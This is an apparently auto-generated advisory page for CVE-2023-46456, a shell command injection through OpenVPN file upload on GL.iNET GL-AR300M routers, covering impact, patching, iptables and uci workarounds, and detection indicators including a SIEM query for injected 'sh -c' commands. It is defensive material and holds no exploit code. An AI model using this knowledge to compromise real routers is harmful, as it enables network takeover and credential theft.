CVE-2023-46456 – This vulnerability allows remote attackers to e... (How to Fix)

📋 TL;DR

This vulnerability allows remote attackers to execute arbitrary shell commands on GL.iNET GL-AR300M routers by exploiting improper input validation in the OpenVPN client file upload functionality. Attackers can gain full control of affected routers, potentially compromising network security and connected devices. Only users of GL-AR300M routers with firmware version 3.216 are affected.

💻 Affected Systems

Products:

GL.iNET GL-AR300M

Versions: Firmware 3.216

Operating Systems: OpenWrt-based firmware

Default Config Vulnerable: ⚠️ Yes

Notes: Only affects routers with OpenVPN client functionality enabled and accessible.

📦 What is this software?

Gl Ar300m Firmware by Gl Inet

View all CVEs affecting Gl Ar300m Firmware →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Complete router compromise leading to network takeover, credential theft, man-in-the-middle attacks, and lateral movement to connected devices.

🟠

Likely Case

Router compromise allowing network monitoring, DNS hijacking, and credential harvesting from connected devices.

🟢

If Mitigated

Limited impact if router is behind firewall with restricted WAN access and proper network segmentation.

🌐 Internet-Facing: HIGH

🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ⚠️ Yes

Weaponized: LIKELY

Unauthenticated Exploit: ⚠️ Yes

Complexity: LOW

Exploitation requires network access to router's web interface or OpenVPN service.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Firmware version after 3.216

Vendor Advisory: https://www.gl-inet.com/

Restart Required: Yes

Instructions:

1. Log into router admin interface
2. Navigate to System > Firmware
3. Check for updates
4. Install latest firmware
5. Reboot router

🔧 Temporary Workarounds

Disable OpenVPN client

linux

Temporarily disable OpenVPN client functionality to prevent exploitation

uci set openvpn.custom_config.enabled='0'
uci commit openvpn
/etc/init.d/openvpn restart

Restrict web interface access

linux

Limit access to router admin interface to trusted IPs only

iptables -A INPUT -p tcp --dport 80 -s TRUSTED_IP -j ACCEPT
iptables -A INPUT -p tcp --dport 443 -s TRUSTED_IP -j ACCEPT
iptables -A INPUT -p tcp --dport 80 -j DROP
iptables -A INPUT -p tcp --dport 443 -j DROP

🧯 If You Can't Patch

Place router behind firewall with strict inbound rules blocking all unnecessary ports
Implement network segmentation to isolate router from critical systems

🔍 How to Verify

Check if Vulnerable:

Check firmware version via web interface at System > Firmware or run 'cat /etc/glversion' on router shell

Check Version:

cat /etc/glversion

Verify Fix Applied:

Confirm firmware version is newer than 3.216 and test OpenVPN file upload functionality

📡 Detection & Monitoring

Log Indicators:

Unusual OpenVPN configuration file uploads
Suspicious shell commands in system logs
Unexpected process execution

Network Indicators:

Unusual outbound connections from router
DNS queries to malicious domains
Port scanning originating from router

SIEM Query:

source="router.log" AND ("openvpn" AND "upload") OR ("sh" AND "-c")

📊 Metadata

CVE ID: CVE-2023-46456

CVSS v3 Score: 9.8 (CRITICAL)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CWE: CWE-74

Published: December 12, 2023

Last Updated: November 21, 2024

🔗 References

https://cyberaz0r.info/2023/11/glinet-multiple-vulnerabilities/ Third Party Advisory
https://www.gl-inet.com/ Product
https://cyberaz0r.info/2023/11/glinet-multiple-vulnerabilities/ Third Party Advisory
https://www.gl-inet.com/ Product

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2023-46456, you might also want to check these: